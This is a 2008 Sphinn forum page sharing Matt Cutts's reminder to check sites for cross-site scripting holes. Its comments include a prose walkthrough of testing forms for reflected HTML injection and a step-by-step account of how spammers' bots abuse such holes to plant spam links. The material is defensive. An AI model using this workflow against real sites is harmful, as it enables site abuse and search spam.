Sphinn Home » SEO
Avatar Went Hot: June 18, 2008 - 1:31 pm
Posted By: DoshDosh 74 days ago
Topic Type: News Story (Jump to http://www.mattcutts.com)
Category: SEO
Just a quick reminder that websites should check for XSS holes on their site, especially freeform text input such as search boxes. Even big sites can have these issues with XSS and escaping user input.
4 Comments     

Comments

from floppy 74 days ago #
Votes: 0 | Vote:
+ -

This is the easiest and most common way to exploit a site. Always pay extra attention to your input fields.  In that post is a link to a post on Google and it gives you some of the most basic ways to check xss input abilities on your site.

from Harith 73 days ago #
Votes: 0 | Vote:
+ -

Just wish to underline the following lines of Matt's current post:

The Google security blog has written about XSS holes and exploits before and how to protect yourself. We’ve also written about protecting your site and cleaning up a hacked site before.

from everett 71 days ago #
Votes: 0 | Vote:
+ -

Either Matt thinks that everyone knows what this means, or that spelling it out will result in people who shouldn't know trying something stupid. But just because you don't know what this stuff means doesn't mean you shouldn't know how to protect yourself - a little.


For those of you who are new to the idea of cross-site-scripting and html injection, here is a quick, easy (the easiest) example of how someone can exploit your forms and how you can test to see if your site has an issue:

First, do a search (One that producses 0 results and one that does produce results) using your internal search bar and/or leave a comment using your contact form. Does the confirmation page repeat what you searched for or put into the comment form? Do you get something like "Your search for yourkeyword produced zero results" where 'yourkeyword' has whatever you typed? OR when the comment form confirmation (or submission form confirmation in cases of directories, etc.) page comes up do you get a repeat of your message, such as "Thank you for contacting us. Your message below has been sent on to our team... Repeatofyourmessage." AND does this confirmation / search result page have it's own unique URL like:
www.yourdomain.com/search.php&keyword=yoursearch ?

Now what happens when you put that keyword inside an href tag by typing it directly into the URL query string or search form? Does the text being repeated on the confirmation page havej the link?

IF SO, you are in danger of someone doing this to you:
  1. Send a bot thru the interwebs testing all the forms for an occurrance of what is described above.
  2. Bot finds that your site does this.
  3. Same bot or new bot sent back to the site to repeat this 1,000 times with 100s of different keywords each linking to a page about their penis enlargement pills, ringtones, offshore gambling site...
  4. Bot reports all the unique URLs back to the spammer, who then either manually or with another bot creates social web profiles, blogger.com blogs, etc... for the purpose of linking to all of these crappy search result / comment / submission confirmation URLs.
  5. Now Googlebot comes by, cralws the links and voila! You have pages in the index that link to Billy Bob's House of Pornophenalia.
I didn't write that to give you any ideas. I wrote it for the 100s of SEOs and webmasters out there who have heard of XSS / Cross Site Scripting, HTML Injections, etc. and don't kow what they are exactly or how to test for them. This tactic is short-lived and only works for serious black-hat spammer-jammers who don't care about burning up dozens of sites for the short-term gain. It ruins the web and is arguably illegal.

Again, that was the EASIEST example I could think of> Just because your site passes this test doesn't mean it's safe. Hire someone to look at it for you if you're unsure.

from demib 71 days ago #
Votes: 0 | Vote:
+ -

Its a good advice to check your search box for XXS holes, but to be honest these days I don't actually see this as the biggest problem. The biggest problem is all the sites that think they did a perfect job in removing all XSS holes on their site - and they did, and then some fool from marketing throws on a webanalytics script that includes a totally unprotected grabbing of the target URL ... and then you have no security left! :)


Log in to comment or register here.

Top 10 Most Sphunn
In What's New

  1. 10 Steps For Gaining 150+ New Subsc... (17)
  2. AdWords Making Big "Quality Score" ... (16)
  3. How to File a Google Reconsideratio... (15)
  4. Why Alert Competitors to Your SEO S... (15)
  5. Traffick: Infinite Regression Award... (15)
  6. Link Development Decathlon « Link P... (14)
  7. 5 Easy Steps to Great IA the SEO Wa... (12)
  8. Google Now Searching For Synonyms (12)
  9. Div ID=”Header” Different SEO Tacti... (11)
  10. Interview with Bill Hartzer (11)

Latest Comments

Search Marketing Expo

Save the date for:
SMX China (Nanjing) - Sept. 23-24
SMX Stockholm - Sept. 23-24: See who's speaking or register now.
SMX East (New York City) - Oct. 6-8: See the agenda or register today and save!
SMX London - Nov. 4-5: Pre-agenda rate now available. Click here.